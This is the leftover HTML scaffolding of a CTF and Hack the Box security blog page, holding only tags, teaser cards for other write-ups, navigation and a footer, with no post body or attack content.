    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">
      
      
        
        <a class="post-tag" href="/tags/htb/">htb</a>
      
        
        <a class="post-tag" href="/tags/ctf/">ctf</a>
      
        
        <a class="post-tag" href="/tags/quantum-computing/">quantum computing</a>
      
        
        <a class="post-tag" href="/tags/qiskit/">qiskit</a>
      
        
        <a class="post-tag" href="/tags/quantum-challenge/">quantum challenge</a>
      
        
        <a class="post-tag" href="/tags/ghidra/">ghidra</a>
      
        
        <a class="post-tag" href="/tags/reverse-engineering/">reverse engineering</a>
      
        
        <a class="post-tag" href="/tags/buffer-overflow/">buffer overflow</a>
      
        
        <a class="post-tag" href="/tags/nsec2021/">nsec2021</a>
      
        
        <a class="post-tag" href="/tags/john-the-ripper/">john the ripper</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->
  
  
  <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
    <span class="pl-3 pt-2 mb-2">Contents</span>
    <nav id="toc" data-toggle="toc"></nav>
  </div>
  

</div> <!-- #panel-wrapper -->


</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.

 v2.0
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/hack-the-box/2020/04/05/htb-machine-registry/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Apr  5, 2020
  

  <i class="unloaded">2020-04-05T09:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Registry</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Working with insecure Docker credentials we manage to extract a SSH key and corresponding password crumbs for an initial user foothold. Following that access we find a sqlite file ...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 19, 2019
  

  <i class="unloaded">2019-10-19T12:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Ellingson</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Ellingson was a very interesting box personally. Marked as hard by Hackthebox it involved web enumeration and python console abuse for initial foothold, finding sensitive backup fi...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/26/htb-machine-safe/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 26, 2019
  

  <i class="unloaded">2019-10-26T10:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Safe</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Marked as easy, Safe is a contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking a KeepPass database. Personally I absol...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->



    <!--
  Navigation buttons at the bottom of the post.

  v2.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/reverse-engineering/2019/09/28/buffer-overflow-practical-case-study/" class="btn btn-outline-primary">
    <p>Buffer Overflows - CTF Prep</p>
  </a>
  

  
  <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/" class="btn btn-outline-primary">
    <p>Hack the Box - Ellingson</p>
  </a>
  

</div>

    

    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->

<!-- image lazy load: https://github.com/ApoorvSaxena/lozad.js -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('#post-wrapper img');
  const observer = lozad(imgs);
  observer.observe();
</script>



        <!--
  The Footer
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://www.linkedin.com/in/downingpatrick">Patrick Downing</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
        <a href="/tabs/disclaimer"> Privacy Policy</a>
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        Powered by
        <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
        with
        <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a>
        theme.
      </p>
    </div>
    <script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
    <script type="text/javascript" src="/assets/js/lightbox.js"></script>
    <link rel="stylesheet" href="/assets/css/lightbox.css">
  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

    </div> <!-- #main-wrapper -->

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>
  </body>
</html>
